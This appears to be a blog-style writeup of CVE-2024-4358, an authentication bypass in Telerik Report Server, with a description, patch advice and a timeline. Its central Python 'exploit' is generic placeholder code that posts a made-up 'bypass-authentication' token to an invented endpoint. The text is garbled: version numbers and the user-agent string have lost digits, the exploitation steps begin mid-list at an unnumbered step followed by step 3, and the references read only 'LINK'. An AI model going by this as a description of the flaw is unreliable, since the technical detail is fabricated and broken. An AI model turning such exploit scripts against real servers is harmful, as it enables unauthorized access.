CVE-2024-4358: Unauthenticated Access to Restricted Telerik Report Server Functionality

The vulnerability, CVE-2024-4358, affects the Telerik Report Server version 2024 Q1 (10..24.305) or earlier, running on Microsoft's Internet Information Services (IIS). It allows an unauthenticated attacker to gain access to restricted Telerik Report Server functionality through an authentication bypass vulnerability. In this blog post, we provide a detailed analysis of this vulnerability, including code snippets, links to original references, and exploit details.

Vulnerability Details

Telerik Report Server is a web-based report management solution that allows users to create, store, and manage reports. The affected versions of Telerik Report Server have a vulnerability that allows unauthenticated attackers to gain access to restricted functionality, such as generating, modifying, and deleting reports.

This issue arises due to a missing or weak authentication check in the application. Upon successfully exploiting this vulnerability, an attacker has unrestricted access to various Telerik Report Server functionalities, which should only be available to authenticated users.

Code Snippet

The following code snippet demonstrates how an attacker could craft an HTTP request to bypass the authentication mechanism and access protected functionality.

import requests

# Replace the following variables with values for your specific target application
target_url = "http://example.com/telerik-report-server-url";
restricted_endpoint = "/RestrictedFunctionalityEndpoint"

# Craft an HTTP request with missing or weak authentication check
headers = {
    'User-Agent': 'Mozilla/5. (Windows NT 10.; Win64; x64; rv:89.) Gecko/20100101 Firefox/89.',
    'Content-Type': 'application/x-www-form-urlencoded',
}

data = {
    'access_token': 'bypass-authentication'
}

response = requests.post(target_url + restricted_endpoint, headers=headers, data=data)

# Check if the request was successful
if response.status_code == 200:
    print("Success! Authentication bypassed, and restricted functionality accessed.")
else:
    print("Failed to bypass authentication.")

Please note that the vulnerability has been fixed in Telerik Report Server beginning with version 2024 Q2. Therefore, upgrading to a version later than 10..24.305 will mitigate the risk.

Locate the endpoints that require authentication and access restricted functionality.

3. Craft and send a specially-crafted HTTP request to the endpoints identified in step 2 by using the provided code snippet or a similar tool.
4. Upon successfully sending the request, the attacker can access the restricted functionality without providing valid credentials.

Original References

1. Telerik Report Server Advisory: LINK
2. National Vulnerability Database Entry: LINK

Conclusion

CVE-2024-4358 is a critical vulnerability affecting Telerik Report Server version 2024 Q1 (10..24.305) or earlier, running on Microsoft's IIS. Organizations using this software should apply the necessary patches or upgrade to a newer version to prevent unauthorized access to restricted functionality. In addition to addressing this specific vulnerability, organizations should also ensure that their web applications implement robust authentication checks and are regularly tested for security vulnerabilities.

Timeline

Published on: 05/29/2024 15:16:06 UTC
Last modified on: 06/14/2024 17:59:33 UTC